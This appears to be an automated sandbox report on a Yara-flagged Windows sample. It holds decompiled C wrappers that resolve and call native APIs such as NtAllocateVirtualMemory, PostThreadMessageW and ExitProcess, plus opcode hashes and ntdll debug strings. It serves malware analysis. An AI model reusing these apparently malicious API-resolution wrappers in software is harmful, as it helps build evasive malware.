                                                    				E0041A960(_t22, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                                    				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                    				return _t14;
                                                    			}

                                                    APIs
                                                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB34,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 00419F79
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.725306924.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateMemoryVirtual
                                                    • String ID:
                                                    • API String ID: 2167126740-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00419F40(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                    				long _t14;
                                                    				void* _t21;
                                                    
                                                    				_t3 = _a4 + 0xc60; // 0xca0
                                                    				E0041A960(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                                    				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                    				return _t14;
                                                    			}

                                                    APIs
                                                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB34,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 00419F79
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.725306924.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateMemoryVirtual
                                                    • String ID:
                                                    • API String ID: 2167126740-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 00419EB5
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.725306924.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Close
                                                    • String ID:
                                                    • API String ID: 3535843008-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 00419EB5
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.725306924.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Close
                                                    • String ID:
                                                    • API String ID: 3535843008-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 85638cc8fad4fb70919e8eaa117fb27b283e59e174425d9cbb0e11745f58cb58
                                                    • Instruction ID: 1037eac0604e0906d10f856768fb270a1be5565f34fea4818fb4190b3d77bf8d
                                                    • Opcode Fuzzy Hash: 85638cc8fad4fb70919e8eaa117fb27b283e59e174425d9cbb0e11745f58cb58
                                                    • Instruction Fuzzy Hash: EE9002B124100402D1407199C404B461095B7D0341F51C411E5455958EC6998DD576A5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 8e0cd4fdd1c7d91cac3ba69aef9b522dd36943cd32ce69e8935d8db7e1559e06
                                                    • Instruction ID: 2786bcdd64e76bb58f891a7aec576c185762fd050cf2a255a5bbef7a0f1d4326
                                                    • Opcode Fuzzy Hash: 8e0cd4fdd1c7d91cac3ba69aef9b522dd36943cd32ce69e8935d8db7e1559e06
                                                    • Instruction Fuzzy Hash: 1C9002A138100442D1007199C414F061095F7E1341F51C415E1455958DC659CC527166
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 659beb9ed867d64b72130adbbcb9ae34fba83127751b5831638ffcc5a959b3ed
                                                    • Instruction ID: b6d52b752871bd4e479429cd1e83b6f7dedcc47c22a8d06e223ac3e972a0a04a
                                                    • Opcode Fuzzy Hash: 659beb9ed867d64b72130adbbcb9ae34fba83127751b5831638ffcc5a959b3ed
                                                    • Instruction Fuzzy Hash: B2900261282041525545B199C4049075096B7E0281791C412E1805D54CC5669856E661
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: fa6a590084d5a774284627cf27b0fb031445ee6b32500c0187e231c06ea1438a
                                                    • Instruction ID: 28cfe50064076c292fec20b8a89aae94e14d4a6c7393d3065be61aa367779b35
                                                    • Opcode Fuzzy Hash: fa6a590084d5a774284627cf27b0fb031445ee6b32500c0187e231c06ea1438a
                                                    • Instruction Fuzzy Hash: 6B90027124100413D1117199C504B071099B7D0281F91C812E081595CDD6968952B161
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 19b7fbd481e792eba44bdcf2e509e1a826e530a53bfdcecdb4f0d202bee57352
                                                    • Instruction ID: f211351156de167d2d15d2e73895d195f32cc0bd2dc28b03f7d110912ac120b5
                                                    • Opcode Fuzzy Hash: 19b7fbd481e792eba44bdcf2e509e1a826e530a53bfdcecdb4f0d202bee57352
                                                    • Instruction Fuzzy Hash: 9C90026164100502D1017199C404A16109AB7D0281F91C422E1415959ECA658992B171
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: d90a9f89015d4b78e46688b95eb9c17075329938e68bc38cd4a37469588c649f
                                                    • Instruction ID: ce4e74b92e71dbce0ff18ce3b00bc3e513d25df535cd20fa1cafb7a1ca6254f5
                                                    • Opcode Fuzzy Hash: d90a9f89015d4b78e46688b95eb9c17075329938e68bc38cd4a37469588c649f
                                                    • Instruction Fuzzy Hash: F190026125180042D20075A9CC14F071095B7D0343F51C515E0545958CC95588616561
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: ff2c05d9b9b95be7f1bb2455af6cfbef907c39062bb305cca1eb940477f8583d
                                                    • Instruction ID: 4e431e6f19e4ca6fbb19938db499f5bc1983e960321ac2100abdc510989036af
                                                    • Opcode Fuzzy Hash: ff2c05d9b9b95be7f1bb2455af6cfbef907c39062bb305cca1eb940477f8583d
                                                    • Instruction Fuzzy Hash: 3A90027124140402D1007199C814B0B1095B7D0342F51C411E1555959DC665885175B1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 43a8384131672b4a2dcbbb45ee3d38865f49d61f60d14f89e70eb290d8b22d28
                                                    • Instruction ID: 6805b1cf79ae779b6b3d351bc1a755c60727a642d44d0b90f0b54a161f9bdc55
                                                    • Opcode Fuzzy Hash: 43a8384131672b4a2dcbbb45ee3d38865f49d61f60d14f89e70eb290d8b22d28
                                                    • Instruction Fuzzy Hash: 1C90026164100042414071A9C844D065095BBE1251751C521E0D89954DC599886566A5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: ea6a6d82b4436107f4834fb642b258c289b5153c9c410505f9c1a614bced0971
                                                    • Instruction ID: f3d9907f04227e8190ee20c3afd3cd8302a91502418f6a19de613fa39b96a8ec
                                                    • Opcode Fuzzy Hash: ea6a6d82b4436107f4834fb642b258c289b5153c9c410505f9c1a614bced0971
                                                    • Instruction Fuzzy Hash: DC900265251000030105B599870490710D6B7D5391351C421F1406954CD66188616161
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: c3a7255f31c04c6957220719b424892e119f9b29170972ee484b3c7a5be5c752
                                                    • Instruction ID: 0a67c8eebf9778067c078877c3df4d42e04e686e3bc77d01f3cee6a7d3fbb42a
                                                    • Opcode Fuzzy Hash: c3a7255f31c04c6957220719b424892e119f9b29170972ee484b3c7a5be5c752
                                                    • Instruction Fuzzy Hash: 389002A12420000341057199C414A16509AB7E0241B51C421E1405994DC56588917165
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 16c776c1cd17969cc28282003841f674d43bead080a5ecc8f5b47b935dc36fbb
                                                    • Instruction ID: b0dbdb9c391b6aef577f00679bfee10c069593f5eb8c302f343fa0c13e872ebd
                                                    • Opcode Fuzzy Hash: 16c776c1cd17969cc28282003841f674d43bead080a5ecc8f5b47b935dc36fbb
                                                    • Instruction Fuzzy Hash: 5490027124100402D10075D9D408A461095B7E0341F51D411E5415959EC6A588917171
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 6c9852dd7ddd02405ee0fee81a003baa7a209091e246e9c8fd620f066914fff1
                                                    • Instruction ID: dfdb8f6e4be3a0c8baa73371204e3627f2be5199983f59e2fbd5d6571894948a
                                                    • Opcode Fuzzy Hash: 6c9852dd7ddd02405ee0fee81a003baa7a209091e246e9c8fd620f066914fff1
                                                    • Instruction Fuzzy Hash: 1690026925300002D1807199D408A0A1095B7D1242F91D815E040695CCC95588696361
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: b66cddf68b2b442dfec97c8cb3359501d62e968eee00c6031f7bae850e8ea0ff
                                                    • Instruction ID: 941ac11bb27b41e432e5db5ab61e61dbff02da47178bb3bfc6325a257b769aa3
                                                    • Opcode Fuzzy Hash: b66cddf68b2b442dfec97c8cb3359501d62e968eee00c6031f7bae850e8ea0ff
                                                    • Instruction Fuzzy Hash: 6390026134100003D1407199D418A065095F7E1341F51D411E0805958CD95588566262
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: f7d56c603b06926b98f0f89fd77be6abea74ebffa2aed78dee3204b1aa517bac
                                                    • Instruction ID: 422587ccd056fe06e4318ef1aa9bc5fa48f28a56b284bf7f1624a846448a0cb0
                                                    • Opcode Fuzzy Hash: f7d56c603b06926b98f0f89fd77be6abea74ebffa2aed78dee3204b1aa517bac
                                                    • Instruction Fuzzy Hash: 9C90027124100802D1807199C404A4A1095B7D1341F91C415E0416A58DCA558A5977E1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 1ceddaa2d3a48fb02eb2d4a30251a09120dcfc716128a961ba528efa527760dd
                                                    • Instruction ID: f302204ff9dbcb59c57a15704b5cc38b2478e3ec64019097269cfc43e517a32a
                                                    • Opcode Fuzzy Hash: 1ceddaa2d3a48fb02eb2d4a30251a09120dcfc716128a961ba528efa527760dd
                                                    • Instruction Fuzzy Hash: CD90027124108802D1107199C404B4A1095B7D0341F55C811E4815A5CDC6D588917161
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.725306924.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1da3a0a51de53f8e4f95f41efafe70bd92c6e1b826fb8f0c5d51986441d80343
                                                    • Instruction ID: 3804b4b6881f0f279124858c5e35b72bf87e4fbc11d5a75f000cd7e24852ad46
                                                    • Opcode Fuzzy Hash: 1da3a0a51de53f8e4f95f41efafe70bd92c6e1b826fb8f0c5d51986441d80343
                                                    • Instruction Fuzzy Hash: 64213CB2D4020857CB25D664AD42AEF737CEB54308F04017FE949A3182F7387E49CBA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 82%
                                                    			E004082F0(void* __eflags, intOrPtr _a4, long _a8) {
                                                    				char _v67;
                                                    				char _v68;
                                                    				void* _t12;
                                                    				intOrPtr* _t13;
                                                    				int _t14;
                                                    				long _t21;
                                                    				intOrPtr* _t25;
                                                    				void* _t26;
                                                    				void* _t30;
                                                    				int _t32; // added: used below but missing from the decompiler's declarations
                                                    
                                                    				_t30 = __eflags;
                                                    				_v68 = 0;
                                                    				E0041B860( &_v67, 0, 0x3f);
                                                    				E0041C400( &_v68, 3);
                                                    				_t12 = E0040ACD0(_t30, _a4 + 0x1c,  &_v68); // executed
                                                    				_t13 = E00414E20(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
                                                    				_t25 = _t13;
                                                    				if(_t25 != 0) {
                                                    					_t21 = _a8;
                                                    					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
                                                    					_t32 = _t14;
                                                    					if(_t14 == 0) {
                                                    						_t14 =  *_t25(_t21, 0x8003, _t26 + (E0040A460(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
                                                    					}
                                                    					return _t14;
                                                    				}
                                                    				return _t13;
                                                    			}

                                                    APIs
                                                    • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.725306924.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: MessagePostThread
                                                    • String ID:
                                                    • API String ID: 1836367815-0
                                                    • Opcode ID: afab1aa1c4a0f2d606ceb08e1db99e52839e25c93945885a0af06a200761294b
                                                    • Instruction ID: 99221eaed4bb2b1c73ef210b546efabe7985b039c1aa6a3efaa8447a865c7254
                                                    • Opcode Fuzzy Hash: afab1aa1c4a0f2d606ceb08e1db99e52839e25c93945885a0af06a200761294b
                                                    • Instruction Fuzzy Hash: 7601D831A8031876E720A6959C43FFE772C6B40F54F044019FF04BA1C1D6A8691646EA
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 50%
                                                    			E0041A0AA(intOrPtr _a4, int _a8, void* _a73) {
                                                    				void* _t13;
                                                    				intOrPtr _t6; // added: used below but missing from the decompiler's declarations
                                                    
                                                    				asm("loope 0x51");
                                                    				asm("adc dl, [ebp-0x75]");
                                                    				_t6 = _a4;
                                                    				E0041A960(_t13, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t6 + 0xa14)), 0, 0x36);
                                                    				ExitProcess(_a8);
                                                    			}

                                                    APIs
                                                    • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A0D8
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.725306924.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExitProcess
                                                    • String ID:
                                                    • API String ID: 621844428-0
                                                    • Opcode ID: efebc6a30e51b2aa4de86ae9a7c9d89e57547fa4564066cff83aab6159ce26ab
                                                    • Instruction ID: dd496631c1f2cc90e9e9b98176d14c81f0c66b116a94532af9d6864d4d58034e
                                                    • Opcode Fuzzy Hash: efebc6a30e51b2aa4de86ae9a7c9d89e57547fa4564066cff83aab6159ce26ab
                                                    • Instruction Fuzzy Hash: AD015AB2204148ABCB14CFA9CC81DEB7BA9EF8C750F05864DFA4C97241C634E811CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E0041A070(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                                    				char _t10;
                                                    				void* _t15;
                                                    
                                                    				_t3 = _a4 + 0xc74; // 0xc74
                                                    				E0041A960(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                                    				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                                    				return _t10;
                                                    			}

                                                    APIs
                                                    • RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A09D
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.725306924.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FreeHeap
                                                    • String ID:
                                                    • API String ID: 3298025750-0
                                                    • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                    • Instruction ID: ebe44f756a2289fd31ae4d5b5361048190c1dc89d00c79db85c43397b2838655
                                                    • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                    • Instruction Fuzzy Hash: 81E01AB12102086BD714DF59CC45EA777ACEF88750F018559B90857241C630E9108AB0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E0041A030(intOrPtr _a4, void* _a8, long _a12, long _a16) {
                                                    				void* _t10;
                                                    				void* _t15;
                                                    
                                                    				E0041A960(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                                                    				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
                                                    				return _t10;
                                                    			}

                                                    APIs
                                                    • RtlAllocateHeap.NTDLL(00414506,?,00414C7F,00414C7F,?,00414506,?,?,?,?,?,00000000,00409CD3,?), ref: 0041A05D
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.725306924.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateHeap
                                                    • String ID:
                                                    • API String ID: 1279760036-0
                                                    • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                    • Instruction ID: 0bf4e0d92ddb4de2ba6a166865ddf054dca1a4f918bcd24d9368b88a9b8aca1a
                                                    • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                    • Instruction Fuzzy Hash: F1E012B1210208ABDB14EF99CC81EA777ACEF88664F158559BA086B242C630F9108AB0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E0041A1D0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                                    				int _t10;
                                                    				void* _t15;
                                                    
                                                    				E0041A960(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
                                                    				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                                    				return _t10;
                                                    			}






                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A200
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.725306924.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                    • Instruction ID: 46e8f913edfca5d9b668009ee454d724baa27d6f5a7db77fbc9955010344b6d9
                                                    • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                    • Instruction Fuzzy Hash: 22E01AB12002086BDB10DF49CC85EE737ADEF88650F018555BA0C67241C934E8508BF5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E0041A0B0(intOrPtr _a4, int _a8) {
                                                    				void* _t10;
                                                    
                                                    				_t5 = _a4;
                                                    				E0041A960(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                                                    				ExitProcess(_a8);
                                                    			}





                                                    APIs
                                                    • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A0D8
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.725306924.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExitProcess
                                                    • String ID:
                                                    • API String ID: 621844428-0
                                                    • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                    • Instruction ID: eb2c75e7f7166c4cf28644cd9339eacac336c717648a3dafe3de7fd5e277bb7f
                                                    • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                    • Instruction Fuzzy Hash: 4CD017726102187BD620EB99CC85FD777ACDF48BA0F0584A9BA5C6B242C531BA108AE1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 8031ec8bbcd5f1d5445064a091ba8476d074459aa6cb109d9950ecbdb9b4532d
                                                    • Instruction ID: 64ae32f6c1248517d4fb298d0b5879a9b6d64a310c77f16a944ffea97d873dea
                                                    • Opcode Fuzzy Hash: 8031ec8bbcd5f1d5445064a091ba8476d074459aa6cb109d9950ecbdb9b4532d
                                                    • Instruction Fuzzy Hash: 60B02B718010C0C5D601E3A08608F1B394077D0300F12C011D1020A40B4338C080F1B1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    Strings
                                                    • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 015EB53F
                                                    • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 015EB323
                                                    • <unknown>, xrefs: 015EB27E, 015EB2D1, 015EB350, 015EB399, 015EB417, 015EB48E
                                                    • This failed because of error %Ix., xrefs: 015EB446
                                                    • *** A stack buffer overrun occurred in %ws:%s, xrefs: 015EB2F3
                                                    • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 015EB47D
                                                    • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 015EB38F
                                                    • The instruction at %p tried to %s , xrefs: 015EB4B6
                                                    • *** enter .exr %p for the exception record, xrefs: 015EB4F1
                                                    • an invalid address, %p, xrefs: 015EB4CF
                                                    • write to, xrefs: 015EB4A6
                                                    • *** An Access Violation occurred in %ws:%s, xrefs: 015EB48F
                                                    • Go determine why that thread has not released the critical section., xrefs: 015EB3C5
                                                    • The resource is owned exclusively by thread %p, xrefs: 015EB374
                                                    • *** Inpage error in %ws:%s, xrefs: 015EB418
                                                    • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 015EB314
                                                    • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 015EB484
                                                    • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 015EB2DC
                                                    • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 015EB3D6
                                                    • The critical section is owned by thread %p., xrefs: 015EB3B9
                                                    • The resource is owned shared by %d threads, xrefs: 015EB37E
                                                    • The instruction at %p referenced memory at %p., xrefs: 015EB432
                                                    • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 015EB305
                                                    • *** enter .cxr %p for the context, xrefs: 015EB50D
                                                    • a NULL pointer, xrefs: 015EB4E0
                                                    • read from, xrefs: 015EB4AD, 015EB4B2
                                                    • *** Resource timeout (%p) in %ws:%s, xrefs: 015EB352
                                                    • *** then kb to get the faulting stack, xrefs: 015EB51C
                                                    • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 015EB39B
                                                    • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 015EB476
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                    • API String ID: 0-108210295
                                                    • Opcode ID: a62671552883108f91445312feddfe3dd68954ae3a5b539d307e3e413c01d192
                                                    • Instruction ID: 879b56b123fc0f026917c7bdcb9e0ecb9b2f2f83076d15b3ca7bfc6c75379816
                                                    • Opcode Fuzzy Hash: a62671552883108f91445312feddfe3dd68954ae3a5b539d307e3e413c01d192
                                                    • Instruction Fuzzy Hash: D781F676E40221FFDB296E8ACC4ED6F3BB6FF97A92F404048F5042F152E2659441CA72
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 44%
                                                    			E015F1C06() {
                                                    				signed int _t27;
                                                    				char* _t104;
                                                    				char* _t105;
                                                    				intOrPtr _t113;
                                                    				intOrPtr _t115;
                                                    				intOrPtr _t117;
                                                    				intOrPtr _t119;
                                                    				intOrPtr _t120;
                                                    
                                                    				_t105 = 0x15148a4;
                                                    				_t104 = "HEAP: ";
                                                    				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                    					_push(_t104);
                                                    					E0153B150();
                                                    				} else {
                                                    					E0153B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                    				}
                                                    				_push( *0x162589c);
